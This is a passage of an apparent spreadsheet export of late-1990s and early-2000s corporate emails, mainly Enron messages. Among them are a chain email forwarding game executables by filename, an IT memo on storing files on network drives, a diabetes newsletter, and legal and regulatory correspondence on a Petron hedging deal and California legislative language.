From: Cynthia Lockett [mailto:cmlockett@earthlink.net]_x000D_
Sent: Thursday, December 09, 1999 8:28 AM_x000D_
To: lOCKETTMD@MFR.USMC.MIL_x000D_
Subject: Fw: GAMES_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Lockett.Cynthia &lt;Lockett.Cynthia@DIMAC.COM&gt;_x000D_
To: 'CYNTHIA LOCKETT' &lt;CMLOCKETT@earthlink.net&gt;_x000D_
Date: Tuesday, November 30, 1999 12:07 PM_x000D_
Subject: FW: HEY LADY I hope you like this._x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;&gt; -----Original Message-----_x000D_
&gt;&gt; From: Sykes.Teressa_x000D_
&gt;&gt; Sent: Monday, November 29, 1999 2:01 PM_x000D_
&gt;&gt; To: Lockett.Cynthia_x000D_
&gt;&gt; Subject: FW: HEY LADY I hope you like this._x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt; Thanks_x000D_
&gt;&gt; Teressa_x000D_
&gt;&gt;_x000D_
&gt;&gt; -----Original Message-----_x000D_
&gt;&gt; From: smyers@intercardinc.com [SMTP:smyers@intercardinc.com]_x000D_
&gt;&gt; Sent: Monday, November 29, 1999 10:30 AM_x000D_
&gt;&gt; To: avincent@intercardinc.com; dlayton@intercardinc.com;_x000D_
&gt;&gt; kmichael@intercardinc.com; pnix@intercardinc.com;_x000D_
&gt;&gt; dreidel@intercardinc.com; shauna.lewis@mkg.com; sykes.teressa@dimac.com;_x000D_
&gt;&gt; br8822@aol.com_x000D_
&gt;&gt; Subject: HEY LADY I hope you like this._x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt; ---------------------- Forwarded by Sheryl Myers/Intercard_Inc. on_x000D_
&gt;&gt; 11/29/99_x000D_
&gt;&gt; 10:28 AM ---------------------------_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt; Vincent Redmond_x000D_
&gt;&gt; 11/29/99 10:24 AM_x000D_
&gt;&gt;_x000D_
&gt;&gt; To: Sheryl Myers/Intercard_Inc.@Intercard_Inc._x000D_
&gt;&gt; cc:_x000D_
&gt;&gt; Subject: HEY LADY I hope you like this._x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt; ---------------------- Forwarded by Vincent Redmond/Intercard_Inc. on_x000D_
&gt;&gt; 11/29/99 10:17 AM ---------------------------_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt; "Taylor, Christopher E" &lt;Christopher.E.Taylor@stls.frb.org&gt; on 11/24/99_x000D_
&gt;&gt; 04:56:05 PM_x000D_
&gt;&gt;_x000D_
&gt;&gt; To:_x000D_
&gt;&gt; cc:    (bcc: Vincent Redmond/Intercard_Inc.)_x000D_
&gt;&gt; Subject: FW: *****GAMES******Some thing to do when you guy are not_x000D_
busy_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;  &lt;&lt;JACKS2.EXE&gt;&gt;  &lt;&lt;BLOCKS3.EXE&gt;&gt;  &lt;&lt;CHECKERS.EXE&gt;&gt;  &lt;&lt;CODEBRAK.EXE&gt;&gt;_x000D_
&gt;&gt; &lt;&lt;DOMINOES.EXE&gt;&gt;  &lt;&lt;DOTS.EXE&gt;&gt;  &lt;&lt;FLAGHUNT.EXE&gt;&gt;  &lt;&lt;HANGMAN3.EXE&gt;&gt;_x000D_
&gt;&gt; &lt;&lt;HYPEROID.EXE&gt;&gt;  &lt;&lt;AFORCE.EXE&gt;&gt;  &lt;&lt;MARIO.EXE&gt;&gt;  &lt;&lt;PACPC.EXE&gt;&gt;_x000D_
&gt;&gt; &lt;&lt;POOL.EXE&gt;&gt;_x000D_
&gt;&gt;  &lt;&lt;SLOT.EXE&gt;&gt;  &lt;&lt;SPADES.EXE&gt;&gt;  &lt;&lt;SQUASH.EXE&gt;&gt;  &lt;&lt;STICKS.EXE&gt;&gt;_x000D_
&lt;&lt;SOL.EXE&gt;&gt;_x000D_
&gt;&gt; &lt;&lt;Killbees.exe&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;  &lt;&lt;JACKS2.EXE&gt;&gt;  &lt;&lt;BLOCKS3.EXE&gt;&gt;  &lt;&lt;CHECKERS.EXE&gt;&gt;  &lt;&lt;CODEBRAK.EXE&gt;&gt;_x000D_
&gt;&gt; &lt;&lt;DOMINOES.EXE&gt;&gt;  &lt;&lt;DOTS.EXE&gt;&gt;  &lt;&lt;FLAGHUNT.EXE&gt;&gt;  &lt;&lt;HANGMAN3.EXE&gt;&gt;_x000D_
&gt;&gt; &lt;&lt;HYPEROID.EXE&gt;&gt;  &lt;&lt;AFORCE.EXE&gt;&gt;  &lt;&lt;MARIO.EXE&gt;&gt;  &lt;&lt;PACPC.EXE&gt;&gt;_x000D_
&gt;&gt; &lt;&lt;POOL.EXE&gt;&gt;  &lt;&lt;SLOT.EXE&gt;&gt;  &lt;&lt;SPADES.EXE&gt;&gt;  &lt;&lt;SQUASH.EXE&gt;&gt;_x000D_
&lt;&lt;STICKS.EXE&gt;&gt;_x000D_
&gt;&gt;  &lt;&lt;SOL.EXE&gt;&gt;  &lt;&lt;Killbees.exe&gt;&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
 - att1.htm_x000D_
 - JACKS2.EXE_x000D_
 - BLOCKS3.EXE_x000D_
 - CHECKERS.EXE_x000D_
 - CODEBRAK.EXE_x000D_
 - DOMINOES.EXE_x000D_
 - DOTS.EXE_x000D_
 - FLAGHUNT.EXE_x000D_
 - HANGMAN3.EXE_x000D_
 - HYPEROID.EXE_x000D_
 - AFORCE.EXE_x000D_
 - MARIO.EXE_x000D_
 - PACPC.EXE_x000D_
 - POOL.EXE_x000D_
 - SLOT.EXE_x000D_
 - SPADES.EXE_x000D_
 - SQUASH.EXE_x000D_
 - STICKS.EXE_x000D_
 - SOL.EXE_x000D_
 - Killbees.exe</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 09:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Wes, do you have the first cut?  John you need to have some input._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 02/01/2001 _x000D_
05:09 PM ---------------------------_x000D_
_x000D_
_x000D_
Greg Whalley_x000D_
02/01/2001 04:47 PM_x000D_
Sent by: Liz M Taylor_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc: John J Lavorato/Enron@EnronXGate, Kay Chapman/HOU/ECT@ECT, Kimberly _x000D_
Hillis/Enron@EnronXGate _x000D_
Subject: 2001 Goals &amp; Objectives_x000D_
_x000D_
Dave,_x000D_
_x000D_
Greg is requesting Enron Americas' 2001 Goals &amp; Objectives (no more than 3 to _x000D_
4 each) asap._x000D_
_x000D_
Many Thanks,_x000D_
_x000D_
Liz Taylor x31935</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 08:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chad.landry@enron.com', 'matthew.lenhart@enron.com'})</t>
  </si>
  <si>
    <t>Christmas Party</t>
  </si>
  <si>
    <t>Hey guys,_x000D_
_x000D_
Just wanted to let you know that Kori Loibl has offered up her apartment as a _x000D_
Pre-party spot.  The financial desk will be there as well as Purvi &amp; her _x000D_
boyfriend and  Mo "the bomb" Sanchez and her fianc,e John.  Don't know if you _x000D_
guys have any interest, but the offer's open.  Either way, we'll have to find _x000D_
someplace extend the festivities after the X-mas party shuts down...(the _x000D_
Black Swan, Eu-grope-a, etc)._x000D_
_x000D_
Susan</t>
  </si>
  <si>
    <t>Mon, 12 Nov 2001 17:02:18 -0800 (PST)</t>
  </si>
  <si>
    <t>do you have rory's email address?</t>
  </si>
  <si>
    <t>Tue, 22 Aug 2000 22:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'richard.tomaski@enron.com', 'lee.fascetti@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Lee, after I put in the deals, the system went down and I was not able to get _x000D_
them to calc.  So they are not in these numbers.  They will be tonight.  See _x000D_
you guys later today._x000D_
_x000D_
DG_x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 15:38:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'anthony.dayao@enron.com'})</t>
  </si>
  <si>
    <t>IT Update: Security/Stability of Revenue-Producing Systems</t>
  </si>
  <si>
    <t>In our continuing effort to provide security and stability to the revenue-producing systems here at EES, we would like to ask for your assistance with a few items.  In general, we want to ensure that all business critical systems are clear from the risk of downtime, which could negatively impact the business._x000D_
_x000D_
So, what does this mean to you?  We need to make sure that any computer programs and files you use to do your job are protected and reside in an environment that is controlled by the IT infrastructure group.  This serves several purposes, including:_x000D_
_x000D_
Ensuring that everything business critical is backed up properly and can be recovered if a workstation's hard drive fails._x000D_
Ensuring that specialized programs like Cobra or BSOC or RPS or RGS which are business critical can easily be installed on any workstation by the IT group.  This will help keep the business up and running if you have to switch workstations suddenly._x000D_
_x000D_
Specialized applications - If you use any special program to do your work, such as WinAT or some other database, analysis, or special utility tool, the IT infrastructure group should be made aware of it so that they can learn how to install and maintain it.  This way, if an elephant sneaks into the office one night and steps on your computer, we can build out another workstation, install the specialized programs on it for you, and deliver it to you so that you can continue to do your job.  Please contact Christine Nguyen at (713) 345-8459 if you think your computer application is not currently maintained by IT._x000D_
_x000D_
Files: Spreadsheets, Excel macros, MS Access databases, and the like - Please make sure that any spreadsheets or MS Access databases you use for the business are not stored on your local computer drives.  These files should be stored on a network-shared drive (in general, something other than C or D drive).  That way, if that elephant comes back another night, we could get you another workstation from which to operate without losing any of your valuable work._x000D_
_x000D_
Web sites - If you are responsible for maintaining a web site that is business critical, including those used by inside as well as outside customers, we need to make sure that this web site is hosted on one of the fault-tolerant redundant web servers provided by IT infrastructure, and not running on a laptop tucked away under your desk.  This will help keep the web site available to those who need it in the event of power outages, server failures, and other unforeseen hardware-related problems.  Please contact Larry Hack at (713) 345-5783 if you think your web site is not currently maintained by IT._x000D_
_x000D_
Your support with this effort is greatly appreciated.</t>
  </si>
  <si>
    <t>Thu, 24 Jan 2002 23:44:49 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ada@clickaction.net'})</t>
  </si>
  <si>
    <t>Diabetes E-News Now!...Get the Diabetes Information You Want!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Welcome to Diabetes E-News Now!, Health Care Professional Edition. _x000D_
_x000D_
You are receiving this newsletter by request. This weekly newsletter provides you with the latest news and events occurring in the world of diabetes and is brought to you by the American Diabetes Association._x000D_
_x000D_
Visit the online community of diabetes.org._x000D_
Explore.  Learn More.  _x000D_
___________________________________x000D_
_x000D_
THIS WEEK'S ISSUE INCLUDES:_x000D_
_x000D_
A MESSAGE FROM THE AMERICAN DIABETES ASSOCIATION..._x000D_
Get the Diabetes Information You Want!_x000D_
_x000D_
PROFESSIONAL EDUCATION..._x000D_
Are You Looking for Practical Strategies to Improve Patient Outcomes?_x000D_
Dallas Regional Postgraduate Course, March 30, 2002_x000D_
17th Annual Southern Regional Postgraduate Course, May 23-26, 2002_x000D_
_x000D_
ONLINE SHOPPING..._x000D_
Learning About Diabetes: A Game for Healthy Living_x000D_
___________________________________x000D_
_x000D_
A MESSAGE FROM THE AMERICAN DIABETES ASSOCIATION..._x000D_
Get the Diabetes Information You Want!_x000D_
Did you know that by registering with the ADA Web site, diabetes.org, you can be provided with the diabetes information that is most interesting to you?  Simply click on the link below.  Once you have chosen your username and password, please take a few moments to tell us what type of diabetes information you are looking for and we'll do the rest!_x000D_
_x000D_
Try it and see: http://www.you-click.net/GoNow/a16366a51186a99406973a1_x000D_
_x000D_
PROFESSIONAL EDUCATION..._x000D_
Are You Looking for Practical Strategies to Improve Patient Outcomes?_x000D_
Attend the 49th Annual Advanced Postgraduate Course, February 1-3, 2002, San Francisco, California_x000D_
Join your colleagues in the city by the bay to learn about the latest treatment and management advances in diabetes.  Meeting Highlight: The program will include a session on innovative strategies for improving outcomes in patients with diabetes and cardiovascular disease.  The session will include topics such as Treating Diabetic Dyslipidemia, Update on New Clinical Trials on CVD and Diabetes and Treating Hypertension: Mono and Combination Therapy.  _x000D_
Don't miss this opportunity!  _x000D_
_x000D_
For program and registration information, click here: http://www.you-click.net/GoNow/a16366a51186a99406973a3. _x000D_
_x000D_
Dallas Regional Postgraduate Course, March 30, 2002_x000D_
The Dallas Regional Postgraduate Course will take place on March 30, 2002, at the Dallas Marriott Las Colinas in Irving, Texas.  Plans for the program include sessions on Obesity, New Diabetes Treatments and Therapies, Nutritional Issues in Diabetes and Clinical Management of CVD in Diabetes.  In addition, workshop and meet-the-professor sessions include Assessment of Risk and Treatment of Obesity in Children, New Medicare Guidelines, Charcot Foot and Combination Therapy and Successful Interventions for Diabetes Self-Management.  _x000D_
_x000D_
For program and registration information, click here: http://www.you-click.net/GoNow/a16366a51186a99406973a2._x000D_
_x000D_
17th Annual Southern Regional Postgraduate Course, _x000D_
May 23-26, 2002_x000D_
Join us at the beautiful Boca Raton Resort &amp; Club for the 17th Annual Southern Regional Conference on Diabetes - a comprehensive diabetes update for health care professionals of all specialities. This year's program features keynote lectures on the topics of Obesity Prevention, New Cardiovascular Risk Factors and much more!  _x000D_
_x000D_
For program and registration information, click here: http://www.you-click.net/GoNow/a16366a51186a99406973a4._x000D_
 _x000D_
_x000D_
ONLINE SHOPPING..._x000D_
Learning About Diabetes: A Game for Healthy Living_x000D_
A great teaching tool for educators, it engages players so they retain more of what they learn.  Great for discovering do's and don'ts and resolving fears and objections. _x000D_
_x000D_
For more information or to order this game, click here:_x000D_
http://www.you-click.net/GoNow/a16366a51186a99406973a0_x000D_
___________________________________x000D_
_x000D_
Some of the articles in Diabetes E-News Now! are generated from wire service stories only and not by the American Diabetes Association. Therefore, the American Diabetes Association has no control over the editorial or grammatical content and does not endorse the information contained in the articles. Neither the American Diabetes Association nor any third-party provider of information guarantees the accuracy, completeness, or usefulness of any content, nor its merchantability or fitness for any particular purpose. The articles mentioned above are available for 21 days from the date of this e-mail. If you experience difficulty accessing the news articles after 21 days, please e-mail:news@diabetes.org. Being a Diabetes E-News Now! Member is free and your privacy is guaranteed._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Click here to forward this message to a friend!_x000D_
http://www.you-click.net/GoForward/a16366a51186aSa99406973a2_x000D_
_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
This e-mail newsletter is sent to you free from the American Diabetes_x000D_
Association. If you do not wish to receive further email communications _x000D_
from the ADA, please visit the following link and select Unsubscribe._x000D_
_x000D_
http://www.you-click.net/Change-Remove/a16366a99406973a2a51186_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 09:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Huber Confirm</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a clean and redline version._x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 12:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Request Submitted: Access Request for lance.schuler-legal@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">You have received this email because the requester specified you as their _x000D_
Manager. Please click _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000035276&amp;Page=_x000D_
Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000035276_x000D_
Request Create Date : 5/16/01 2:37:38 PM_x000D_
Requested For       : lance.schuler-legal@enron.com_x000D_
Resource Name       : Cynet Desktop Faxing_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Jul 1999 01:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Update on Petron Hedging Program</t>
  </si>
  <si>
    <t xml:space="preserve">There was a flurry of activity in March, 1997 involving Petron but it was on _x000D_
the physical side and we never made it to the swap issues.  Again in April, _x000D_
1998, Manuel and John Enerson began looking into the issue of gaming statutes _x000D_
in an effort to attack legislation in the Philippines.  No further legal work _x000D_
was ever attempted.  Hope this helps.  Regards.   SS_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Anita Fam_x000D_
07/18/99 08:46 PM_x000D_
To: Alan B Aronowitz/HOU/ECT@ECT_x000D_
cc: Janice Moore/HOU/ECT@ECT, William S Bradford/HOU/ECT@ECT, Mark - ECT _x000D_
Legal Taylor/HOU/ECT@ECT, Cynthia L Schneider/HOU/ECT@ECT, Sara _x000D_
Shackleton/HOU/ECT@ECT, Wang Moi Eng/SIN/ECT, Manuel P _x000D_
Gallego@ENRON_DEVELOPMENT _x000D_
Subject: Re: Update on Petron Hedging Program  _x000D_
_x000D_
All -_x000D_
_x000D_
I'll be happy to do the legal due dliligence and ISDA documentation from here._x000D_
_x000D_
Bill/Cynthia:_x000D_
Please let me know who in Credit will be handling this so that I can _x000D_
coordinate with them when the need arises._x000D_
_x000D_
Sara:_x000D_
When Janice mentioned the legal due diligence with regard to commodity _x000D_
derivatives in the Philippines, did she mean the legal survey done by Allen &amp; _x000D_
Overy?  If so , I've got copies of all that and can take it from here. If _x000D_
that isn't the case and you've done more ISDA work in the Phillipines since _x000D_
then, I'd be forever grateful if you could send over whatever copies of the _x000D_
stuff which you have for me to suss out the situation there._x000D_
_x000D_
Mark T. /Janice:_x000D_
Is there any particular law firm whom we should work with this time round?_x000D_
_x000D_
Thanks, all._x000D_
_x000D_
Rgds,_x000D_
Anita_x000D_
_x000D_
_x000D_
_x000D_
Alan B Aronowitz_x000D_
07/16/99 10:41 PM_x000D_
To: Janice Moore/HOU/ECT@ECT_x000D_
cc: Anita Fam/SIN/ECT@ECT, William S Bradford/HOU/ECT@ECT, Mark - ECT Legal _x000D_
Taylor/HOU/ECT@ECT, Cynthia L Schneider/HOU/ECT@ECT, Sara _x000D_
Shackleton/HOU/ECT@ECT _x000D_
Subject: Re: Update on Petron Hedging Program  _x000D_
_x000D_
Anita/Sara:_x000D_
_x000D_
I would suggest that Anita handle while coordinating with Sara on the _x000D_
background of the previous work product._x000D_
_x000D_
Alan_x000D_
_x000D_
_x000D_
_x000D_
Janice Moore_x000D_
07/13/99 10:19 AM_x000D_
To: Anita Fam/SIN/ECT@ECT, William S Bradford/HOU/ECT@ECT_x000D_
cc: Mark - ECT Legal Taylor/HOU/ECT@ECT, Alan B Aronowitz/HOU/ECT@ECT, _x000D_
Cynthia L Schneider/HOU/ECT@ECT _x000D_
Subject: Re: Update on Petron Hedging Program_x000D_
_x000D_
Well, it looks like we might have a shot at an ISDA w/ a PHilippines _x000D_
company.  One issue that discussed w/ Manuel but he does not mention in his _x000D_
note is that we would probably require an enforceability opinion from Petron _x000D_
(a compnay jointly owned by the PHilippines govt and Saudi Aramco).  I'm not _x000D_
sure which credit dept. would handle this deal, but Cynthia Schnedier has _x000D_
some familiarity w/ Petron.   I'll leave it to Mark, Alan and Anita to _x000D_
determine whether Anita will handle the ISDA or whether it will be someone _x000D_
from Houston (Sara S. did the original legal due diligence on the _x000D_
enforceability of commodities derivatives contracts in the PHilippines)._x000D_
---------------------- Forwarded by Janice Moore/HOU/ECT on 13.07.99 10:15 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Wang Moi Eng_x000D_
12.07.99 22:31_x000D_
To: "Manuel Gallego/ENRON_DEVELOPMENT" AT ENRON_DEVELOPMENT@CCMAIL @ ENRON_x000D_
cc: John Chismar/SIN/ECT, Hans Wong/SIN/ECT@ECT, Mike Brown@ENRON, Janice _x000D_
Moore/HOU/ECT@ECT, Angel M Esguerra/SIN/ECT@ECT, David A Terlip AT _x000D_
ENRON_DEVELOPMENT@CCMAIL@ENRON, Victor Santos AT _x000D_
ENRON_DEVELOPMENT@CCMAIL@ENRON, Bruce Lundstrom AT _x000D_
ENRON_DEVELOPMENT@CCMAIL@ENRON, Heather J Mitchell AT _x000D_
ENRON_DEVELOPMENT@CCMAIL@ENRON, Alberto J Carreno AT _x000D_
ENRON_DEVELOPMENT@CCMAIL@ENRON _x000D_
Subject: Re: Update on Petron Hedging Program  _x000D_
_x000D_
Manuel,_x000D_
_x000D_
Thanks for the update and we look forward to meet Petron traders/risk _x000D_
management team during our next visit to Manila, probably during our first _x000D_
cargo of gasoil to FGH, currently planned for end August / early September. _x000D_
Kindly let us know on new developments. For your information, John is away on _x000D_
home leave and will be back in office only after mid - August.  _x000D_
_x000D_
Best regards,_x000D_
Eng_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: "Manuel Gallego/ENRON_DEVELOPMENT" AT ENRON_DEVELOPMENT@CCMAIL on _x000D_
13/07/99 10:53 CDT_x000D_
To: John Chismar@ECT, Hans Wong@ECT, Wang Moi Eng@ECT, Mike Brown, Janice _x000D_
Moore@ECT, Angel M Esguerra@ECT, David A Terlip AT ENRON_DEVELOPMENT@CCMAIL, _x000D_
Victor Santos AT ENRON_DEVELOPMENT@CCMAIL, Bruce Lundstrom AT _x000D_
ENRON_DEVELOPMENT@CCMAIL, Heather J Mitchell AT ENRON_DEVELOPMENT@CCMAIL, _x000D_
Alberto J Carreno AT ENRON_DEVELOPMENT@CCMAIL_x000D_
cc:  _x000D_
Subject: Update on Petron Hedging Program_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dear John,_x000D_
_x000D_
Yayette Ventigan of Petron informed me yesterday that the energy derivatives _x000D_
course conducted by Paradigm in Manila from July 7 to 10 was well-received.  _x000D_
I sensed that the course was not deemed easy by the Petron participants.  _x000D_
Further, Yayette indicated that they could have easily used up more time for _x000D_
the same amount of material._x000D_
_x000D_
Given the Paradigm course (and the Citibank course which Yayette attended in _x000D_
Australia), Yayette indicated that the Petron Board will most likely give the _x000D_
marching orders to Petron management on July 27 to (1) develop an initial, _x000D_
basic and conservative hedging program for Petron?s fuel oil and gasoil _x000D_
supplied to the National Power Corporation and (2) go out to the market (most _x000D_
likely through a bid process) and execute a financial risk management _x000D_
contract (ISDA)._x000D_
_x000D_
Yayette indicated that Petron looks forward to the working meeting with _x000D_
Enron?s Singapore traders.  I indicated to Yayette that end of August to _x000D_
early September would probably be convenient for us.  Yayette could not yet _x000D_
determine an appropriate time for Petron._x000D_
_x000D_
With respect to legal expectations, Petron appears to be at ease with the_x000D_
following:_x000D_
_x000D_
?  In general, the concept of disassociating the financial risk management _x000D_
contract from the Philippines with the exception of Petron Corporation (a _x000D_
Philippine corporation) being a party to the contract._x000D_
_x000D_
?  Petron executing a financial risk management contract with an offshore _x000D_
counter-party like Citibank Australia or ECT Singapore._x000D_
_x000D_
?  Petron physically executing the contract outside the Philippines._x000D_
_x000D_
?  The contract to be governed by the laws of the State of New York._x000D_
_x000D_
I did point out to Yayette the need for offshore collateral in the form of a _x000D_
Letter of Credit, which is consistent with the risk of non-enforcement for _x000D_
collateral in the Philippines.  Yayette indicated that she would raise this _x000D_
issue in her discussions with Petron treasury._x000D_
_x000D_
More later as I receive more feedback from Petron._x000D_
_x000D_
Best regards,_x000D_
Manuel_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Jan 2001 15:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.weitekamp@enron.com'})</t>
  </si>
  <si>
    <t>Cost Reporting Highlights for January 25th meeting</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
---------------------- Forwarded by Tracy Geaccone/GPGFIN/Enron on 01/29/2001 11:46 AM ---------------------------_x000D_
_x000D_
_x000D_
Tracy Geaccone_x000D_
01/29/2001 11:44 AM_x000D_
To:	Pat Prendergast/FGT/Enron@Enron_x000D_
cc:	Mary Botello/NA/Enron@Enron _x000D_
_x000D_
Subject:	Cost Reporting Highlights for January 25th meeting_x000D_
_x000D_
What do you think?_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Tracy Geaccone/GPGFIN/Enron on 01/29/2001 11:45 AM ---------------------------_x000D_
_x000D_
_x000D_
Li N Chan@ECT_x000D_
01/29/2001 11:09 AM_x000D_
To:	Stephen Schwarzbach/Corp/Enron@Enron, Madeline Chan/Enron Communications@Enron Communications, Steve Frazier/HOU/EES@EES, Howard Selzer/Corp/Enron@ENRON, Jill Erwin/HOU/ECT@ECT, Sayed Khoja/NA/Enron, Rainier S Cockrell/HOU/ECT@ECT, Sarah Brown/HOU/ECT@ECT, David McEllin/FGT/Enron@ENRON, Kristin Armstrong/HOU/ECT@ECT, Amy Spoede/HOU/ECT@ECT, Joe Darensbourg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mark Frank/HOU/ECT@ECT, Jan Johnson/GPGFIN/Enron@ENRON, Ozlem Mahmood/HOU/EES@EES, Orlean Dorsey/HOU/EES@EES, David Vandor/Corp/Enron@ENRON, Tracy Geaccone/GPGFIN/Enron@ENRON, Pamela Rush/Corp/Enron@ENRON_x000D_
cc:	 _x000D_
_x000D_
Subject:	Cost Reporting Highlights for January 25th meeting_x000D_
_x000D_
Please see attached discussion highlights in the meeting last Wednesday for cost reporting and report format:_x000D_
_x000D_
   _x000D_
_x000D_
If you should have any concerns or questions, please feel free to contact me at any time.  If I am not available please contact Ozlem Mahmood at 5-3296._x000D_
_x000D_
Another session meeting will be set up this week.  I will let you know when it will be.  In the meantime please gather any concerns or questions you may have._x000D_
_x000D_
Thanks again for you participation._x000D_
_x000D_
Li_x000D_
3-0544_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Jul 2001 09:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alan.comnes@enron.com', 'mpalmer@enron.com', 'susan.mara@enron.com', 'harry.kingerski@enron.com', 'linda.robertson@enron.com', 'karen.denne@enron.com', 'michael.tribolet@enron.com', 'paul.kaufman@enron.com', 'skean@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>FYI.  Please keep confidential until further notice.  Important to note that _x000D_
this was delivered with the understanding that NO ONE has agreed to the _x000D_
specific language.  It was a quick turn around (at Hertzberg's request) to _x000D_
get the original, negotiated agreement into Legislative language (i.e., _x000D_
Martian) as soon as possible so that Hertzberg could try to move on it in the _x000D_
Legislature as soon as possible._x000D_
_x000D_
In addition, the Commission is likely to come out with its proposed "rate _x000D_
agreement" sometime this week, and is likely to release DWR's "revenue _x000D_
requirement" next week.  I heard from the Gov's financial advisor that Edison _x000D_
and DWR EACH want 2 cents out of the PUC's recent 3 cent rate increase.  It's _x000D_
going to get very interesting from here._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 07/10/2001 04:11 PM -----_x000D_
_x000D_
	"Simpson, Rick" &lt;Rick.Simpson@asm.ca.gov&gt;_x000D_
	07/10/2001 04:12 PM_x000D_
		 _x000D_
		 To: "'dhunter@s-k-w.com'" &lt;dhunter@s-k-w.com&gt;, "Simpson, Rick" _x000D_
&lt;Rick.Simpson@asm.ca.gov&gt;_x000D_
		 cc: "'Barbara Barkovich (E-mail)'" &lt;brbarkovich@earthlink.net&gt;, "'Dominic _x000D_
DiMare (E-mail)'" &lt;dominic.DiMare@calchamber.com&gt;, "'Dorothy Rothrock _x000D_
(E-mail)'" &lt;drothrock@cmta.net&gt;, "'John Fielder (E-mail)'" _x000D_
&lt;fieldejr@sce.com&gt;, Gary.Schoonyan@sce.com, "'Phil Isenberg (E-mail)'" _x000D_
&lt;isenberg@hmot.com&gt;, "'Jeff Dasovich (E-mail)'" &lt;jdasovic@enron.com&gt;, "'Keith _x000D_
McCrea (E-mail)'" &lt;kmccrea@sablaw.com&gt;, "'Linda Sherif (E-mail)'" _x000D_
&lt;lys@a-klaw.com&gt;, "'Linda Sherif (E-mail 2)'" &lt;lysherif@yahoo.com&gt;, "'John _x000D_
White (E-mail)'" &lt;vjw@cleanpower.org&gt;, Ann.Cohn@sce.com, "Mike Kahl (E-mail)" _x000D_
&lt;mikahl@ka-pow.com&gt;_x000D_
		 Subject: RE: Final Legislative Language_x000D_
_x000D_
_x000D_
You all are awesome.  Many thanks._x000D_
_x000D_
-----Original Message-----_x000D_
From: Delaney Hunter [mailto:dhunter@s-k-w.com]_x000D_
Sent: Tuesday, July 10, 2001 1:56 PM_x000D_
To: Rick.Simpson@asm.ca.gov_x000D_
Cc: 'Barbara Barkovich (E-mail)'; 'Dominic DiMare (E-mail)'; 'Dorothy_x000D_
Rothrock (E-mail)'; 'John Fielder (E-mail)'; Gary.Schoonyan@sce.com;_x000D_
'Phil Isenberg (E-mail)'; 'Jeff Dasovich (E-mail)'; 'Keith McCrea_x000D_
(E-mail)'; 'Linda Sherif (E-mail)'; 'Linda Sherif (E-mail 2)'; 'John_x000D_
White (E-mail)'; Ann.Cohn@sce.com; Mike Kahl (E-mail)_x000D_
Subject: Final Legislative Language_x000D_
_x000D_
_x000D_
Rick-_x000D_
Attached please find our final draft of legislative language per your_x000D_
request. We are ready and willing to draft other sections or language as_x000D_
needed by you or the Speaker. Please feel free to contact me if you have any_x000D_
questions about the draft. Please note there are disagreements over two_x000D_
sections of language and they are so marked._x000D_
_x000D_
FYI - I will be sending this document out to the entire Working Group for_x000D_
their information._x000D_
_x000D_
Thank you,_x000D_
Delaney_x000D_
_x000D_
 - FINAL Legislative Language.doc</t>
  </si>
  <si>
